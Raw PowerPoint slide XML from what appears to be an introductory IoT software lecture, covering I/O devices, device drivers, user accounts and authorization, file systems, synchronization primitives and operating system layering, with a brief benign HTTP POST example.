            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Content-Length: 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>thing1=value&amp;thing2=89</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376763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I/O Devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265470" y="1340069"/>
            <a:ext cx="11459170" cy="4828579"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>I/O is complicated:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Each device has different control interfaces.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>I/O has complex timing characteristics.  It is often much more efficient to start an I/O operation and let other programs run while the I/O operations complete.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>There is an enormous variety of devices and an OS provides a relatively common interface so that programs don’t need to understand the details.  These consist of streaming (or character) devices which accept and return sequences of bytes.  Block devices interface with devices that have addressable locations (like disks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Incorrect I/O operations can cause the complete failure of a computer so the program managing these devices should be “fool-proof.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Handling interrupts (notification that a device completes an operation or needs attention) is an important part of kernel implementations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Example devices:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Disks, DVD’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Printers, keyboards, screens and displays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Speakers and Microphones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>USB connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148521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866" y="0"/>
            <a:ext cx="11100716" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1603948"/>
            <a:ext cx="11582400" cy="4650978"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This is a condensed introduction to software focused on IoT, mainly to give a sense of scope and establish terminology.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A full treatment of this material could actually cover most of computer science.  So we need to make some assumptions.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you can write C++ programs and understand some assembly language.</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you know networking concepts.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you can read ep specifications like the Intel or ARM architecture manuals.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also assume you’re familiar with UNIX like systems.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a fair amount of background material in programming languages, operating systems and computer architecture as well as some crypto, networking and distributed systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A basic introduction to a broad swarth of this is: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Bryant and O’Hallaron, Computer Systems a Programmer’s Perspective.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000"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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229193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2" y="151054"/>
            <a:ext cx="11263382" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Modifying kernels: device drivers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926757" y="2309872"/>
            <a:ext cx="10338486" cy="4434145"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Because of device complexity, as new devices are added, more and more specialized programming is required.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Device drivers separate the particular idiosyncrasies of different devices from common functions.  The vast majority of operating system code is device driver code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IoT devices add a particular kind of I/O called GPIO.  These devices read or write analog voltage values or UART like digital interfaces.  We used these when we connected sensors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334825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52" y="107131"/>
            <a:ext cx="11495882" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Authentication, authorization and accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621977" y="1977081"/>
            <a:ext cx="11170467" cy="4379269"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Operating systems include services that facilitate user interaction.  In the most primitive form, using a computer terminal and keyboard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Users are associated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> identifying the user (e.g.-jlm) and authenticated usually (and unfortunately) by passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>User actions are authorized by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>guard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> which determines whether the requested action (e.g.-reading or writing a file) is permitted for the authenticated account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Most operating systems have a “super-user” or “administrator,” who is authorized to do anything possible, like changing the OS and delegating or removing permissions from other users.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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1682575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File systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="313595" y="1478089"/>
            <a:ext cx="11515731" cy="5350194"/>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An extremely useful service is provided by file systems.  Each file is a linear sequence of bytes (for example, the file representing a particular spreadsheet, a book, a program or just some bytes).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Files are organized within hierarchical directories which are easier to search.  Files have names, you “open” a file by name and the OS manages the details of where on the disk each part of the file is.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The operating system controls access to files by account.  When you create a file, you own it and have access to it.  You can grant others the right to read the file, write it or remove it.  Thus the file system performs file authorization and authentication.  The file paradigm is also applied to channels and devices which inhabit the same namespace.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Not only users (with accounts) can participate in authorization.  Programs can be authorized (or denied) access based on code identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>There are also non-file based authentication and authorization regimes.  For example, some operating systems allow or deny access to API calls based on accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Example filesystems: ext2, ext3, reiserFS, cramfs</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2140178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6" y="167118"/>
            <a:ext cx="11914908" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Synchronization primitives and basic services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621977" y="2161309"/>
            <a:ext cx="11170467" cy="4195042"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Operating systems provide synchronization primitives that are hard to implement.  These include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Events processing and signal handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Secure time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Support for distributed commitment of data values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Multi-processor synchronization of data values preventing race conditions.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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210369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Operating system layering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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="page16image6737856">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6DBDF6E-AF52-CE40-894D-0C1BCE01A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7" y="1723097"/>
            <a:ext cx="9935420" cy="3467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90B75C-E0CF-004B-87C4-B32DDF54B42D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2307771" y="5910943"/>
            <a:ext cx="9150262" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0"/>
              <a:t>urce: https://upload.wikimedia.org/wikipedia/commons/thumb/d/d0/OS- structure2.svg/800px-OS-structure2.svg.png </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
